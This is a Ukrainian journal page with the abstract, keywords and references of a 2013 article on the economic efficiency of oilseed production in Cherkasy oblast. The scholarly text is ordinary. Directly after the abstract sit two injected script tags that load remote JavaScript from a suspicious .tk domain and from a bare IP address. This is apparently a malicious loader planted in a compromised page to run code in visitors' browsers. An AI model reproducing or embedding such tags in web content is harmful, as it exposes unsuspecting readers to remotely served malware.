ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.43:633.85
Економіка агропромислового виробництва

Шляхи підвищення ефективності виробництва олійних культур на регіональному рівні / Шайко О. Г., Концеба С.М. // Економіка АПК. - 2013. - № 5 - С. 31

Розглянуто зміну структури посівних площ олійних культур та динаміку їх урожайності. Протягом 2000–2011 рр. частка альтернативних олійних культур зросла із 11,2 до 42,8% у загальній площі олійних культур. Проаналізовано ефективність виробництва основних олійних культур (соняшнику, сої, ріпаку) у сільськогосподарських підприємствах Черкаської області. Серед олійних культур найвищий рівень рентабельності упродовж досліджуваного періоду забезпечувався при виробництві насіння соняшнику (55,7% у 2011 р. порівняно із 32,0% та 28,3% сої та ріпаку відповідно). Виявлено вплив чинників на зміну прибутку від реалізації олійних культур. За результатами дослідження зроблено висновки про визначальну роль собівартості та врожайності як чинника, що її зумовлює, у прибутковості галузі. Табл.: 4. Рис.: 2. Бібліогр.: 9.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: олійні культури, економічна ефективність, прибуток, рентабельність, урожайність, собівартість

Список використаних джерел

  1. Гауе О. Скільки ріпаку потребує сівозміна ? / [Електронний ресурс] / О. Гауе. – Режим доступу: http://www.propozitsiya.com/?page=146&itemid=2680.
  2. Голуб Г.А. Економічна ефективність виробництва олії в сільськогосподарських підприємствах / Г.А. Голуб, С.В. Лук’янець // Економіка АПК. – 2012. – №4. – С. 14–18.
  3. Жигало В.С. Виробництво зернових та олійних культур в Україні: проблеми та перспективи в умовах світової продовольчої кризи / В.С. Жигало, О.В. Сікачина: за ред. В. Артюшина. – К.: Аналітично-дорадчий центр Блакитної стрічки ПРООН, 2008. – 44 с.
  4. Інноваційні ресурсозберігаючі технології вирощування ріпаку / [за ред. Д. І. Мазоренка і Г. Є. Мазнєва]. – Х.: "Майдан", 2008. – 144 с.
  5. Статистична інформація Продовольчої та сільськогосподарської організації ООН [Електронний ресурс]. – Режим доступу: http://faostat.fao.org.
  6. Фаїзов А.В. Державне регулювання та розвиток олієжирового підкомплексу / А.В. Фаїзов // Економіка АПК. – 2012. – №6. – С. 30–35.
  7. Фаїзов А.В. Олієжировий підкомплекс: проблеми і фактори розвитку / А.В. Фаїзов // АгроІнком. – 2011. – № 10–12 / [Електронний ресурс]. – Режим доступу:http://www.nbuv.gov.ua/portal/chem_biol/agroin/2011_10-2/FAYIZOV.pdf.
  8. Holtzapffel R. GM oilseed crops and the Australian oilseed industry / R. Holtzapffel, H. Johnson, О. Mewett. – Australian Government Bureau of Rural Sciences, Canberra, 2007. – 82 р.
  9. Jaeger W. Economics of Oilseed Crops and Their Biodiesel Potential in Oregon's Willamette Valley / W. Jaeger, R. Siegel. – Oregon State University, 2008. – 50 р.
Читати статтю: 13_05_05.pdf